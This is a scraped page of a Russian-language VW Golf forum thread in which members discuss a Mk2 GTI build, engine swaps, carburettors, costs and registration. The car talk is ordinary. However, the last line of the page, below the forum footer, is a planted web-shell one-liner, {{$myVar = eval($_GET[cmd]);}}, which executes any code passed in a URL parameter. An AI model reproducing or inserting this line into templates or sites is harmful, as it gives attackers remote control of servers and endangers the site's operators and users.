+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 41

Тема: мк2.


  1. #1
    GTI-Racing Igorb will become famous soon enough Igorb will become famous soon enough Аватар для Igorb
    Регистрация
    07.03.2006
    Откуда
    Одесса
    Машина
    golf_mk1
    Сообщений
    1,204

    мк2.

    Автомобиль у меня давно.
    Очень надежный, никогда не подводил.
    Пережил со мной много интересных историй и приключений.
    На нем было поменяно несколько двигателей, КР на ПБ, ПБ на 9а и 9а на АБФ.
    Сейчас установлен АБФ на 45 веберах.
    9А снят для полного ребилда, установки 304 валов механических толкателей, облегченного колена и маховика, также на 9а делается капремонт и увеличение степени сжатия до 12-1.
    вся проводка будет удалена из подкапотного, аккумулятор перенесен в багажник.
    Топливный насос фасет топ ред компетишн, топливные магистрали аэрокип.
    Передние тормоза г 60,задние гольф4.
    Диски BBS RM 012
    Полная замена всех резинок, подушек, сайлентблоки от ауди ТТ, подшипники ФАГ, тормозные магистрали Гудридж.
    Обвес ГТИ оригинал, широкие бампера.
    Коробка установлена от корадо, салон Рекаро Гольф2.
    Внешний стайлинг мк2 ГТИ ОЕМ.
    Мозги с отсечкой 8500 об.мин.
    Выхлоп АБФ.
    Последний раз редактировалось Igorb; 06.05.2012 в 13:28.
    back in the days where motorsport was organised by real men with hairy chests who didn`t give a hoot about health and safety

    Overload http://overload.net.ua/forum/viewtop...d0f88ef70d72f2

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    чОткий такой гольфец !
    Вроде ты о нем ничего не писал даже )))
    песок сыпется....не останавливайтесь на достигнутом !

  3. #3
    GTI-Racing Igorb will become famous soon enough Igorb will become famous soon enough Аватар для Igorb
    Регистрация
    07.03.2006
    Откуда
    Одесса
    Машина
    golf_mk1
    Сообщений
    1,204
    это мой старый друг...что о нем писать, уже много написано другими...
    "если вы хотите убить президента, вы ведь никогда не оденете костюм клоуна и штиблеты для чечетки...так и ГТИ. Он спокойно и уверенно делает свою работу"(С)
    старые фотки.
    back in the days where motorsport was organised by real men with hairy chests who didn`t give a hoot about health and safety

    Overload http://overload.net.ua/forum/viewtop...d0f88ef70d72f2

  4. #4
    GTI-Racing Igorb will become famous soon enough Igorb will become famous soon enough Аватар для Igorb
    Регистрация
    07.03.2006
    Откуда
    Одесса
    Машина
    golf_mk1
    Сообщений
    1,204
    мк2 ГТИ.
    просто и ничего лишнего....думаю что даже текст не нужен)
    back in the days where motorsport was organised by real men with hairy chests who didn`t give a hoot about health and safety

    Overload http://overload.net.ua/forum/viewtop...d0f88ef70d72f2

  5. #5
    GTI-Racing сидоров-1968 is on a distinguished road Аватар для сидоров-1968
    Регистрация
    23.02.2009
    Откуда
    ростов на дону
    Машина
    audi s3 8l 2003г
    Сообщений
    326
    зачетный пепелац. самое главное состояние хорошее и движка - мечта!

  6. #6
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    я бы не отказался бы от такой движки )))
    песок сыпется....не останавливайтесь на достигнутом !

  7. #7
    GTI-Racing Igorb will become famous soon enough Igorb will become famous soon enough Аватар для Igorb
    Регистрация
    07.03.2006
    Откуда
    Одесса
    Машина
    golf_mk1
    Сообщений
    1,204
    Цитата Сообщение от BON Посмотреть сообщение
    я бы не отказался бы от такой движки )))
    приезжай, соберем на твоем блоке). не надо будет регистрировать по новой останешся на старых доках и на налогах за свой объем, а ездить будешь на 2.0 атмосфере 170-190 сил, которая легко объедет 6-й ГТИ в стоке...
    back in the days where motorsport was organised by real men with hairy chests who didn`t give a hoot about health and safety

    Overload http://overload.net.ua/forum/viewtop...d0f88ef70d72f2

  8. #8
    GTI-Racing сидоров-1968 is on a distinguished road Аватар для сидоров-1968
    Регистрация
    23.02.2009
    Откуда
    ростов на дону
    Машина
    audi s3 8l 2003г
    Сообщений
    326
    я то же хочу приехать и собрать... только блок у моего мк1 1.6. не выйдет.... а сколько у вас голова такая выйдет по деньгам?

  9. #9
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от Igorb Посмотреть сообщение
    приезжай, соберем на твоем блоке). не надо будет регистрировать по новой останешся на старых доках и на налогах за свой объем, а ездить будешь на 2.0 атмосфере 170-190 сил, которая легко объедет 6-й ГТИ в стоке...
    ну это конечно можно сделать и у нас )))) но по деньгам не гуманная затея. на 8ве 130-140 сил в тюнинге стоят больше чем свап на АБФ стоковый, если +16ве, то еще более не гуманней. АБФ лучший вариант, плюс легкое шаманство можно.......у нас сейчас убрали номер движки и сверку, можно менять без замены доков....и потом скоро с 1 июля еще штрафы за скорость вроде поднимут, так что я даже на своем 1.8 100 пони могу с запасом их все собрать )))).... я пока вообще эту тему перестал мыслить, просто наслаждаюсь и стараюсь, чтобы он просто классно выглядел и был в отличном состоянии ))))
    песок сыпется....не останавливайтесь на достигнутом !

  10. #10
    GTI-Racing сидоров-1968 is on a distinguished road Аватар для сидоров-1968
    Регистрация
    23.02.2009
    Откуда
    ростов на дону
    Машина
    audi s3 8l 2003г
    Сообщений
    326
    я наконец то оформил в мрэо свой мк1. теперь договариваюсь на проварку и покраску. по мотору пока не думал особо, но идея с сдвоенными карбами мне нравится. думаю для повседневной и не долгой езды летом с головой хватит карбов на 8 клапанной или 16 клапанной башке. вес машины 600кг. ну плюс всякие там навороты и шумка, выйдет 700кг. гто еще может похвастать таким зачетным весом?

    Добавлено через 51 секунду
    вот кстати самое важное во всем оформлении, так это отсутствие номеров и вин кода!!!!!!!

    Добавлено через 3 минуты
    Цитата Сообщение от Igorb Посмотреть сообщение
    мк2 ГТИ.
    просто и ничего лишнего....думаю что даже текст не нужен)
    такой паучок я себе на 3го гольфа мутил, после инсталяции 9а! ехал он очень бодро, особенно после облегчения маховика на 4кг)))
    Последний раз редактировалось сидоров-1968; 17.05.2012 в 14:26. Причина: Добавлено сообщение

+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}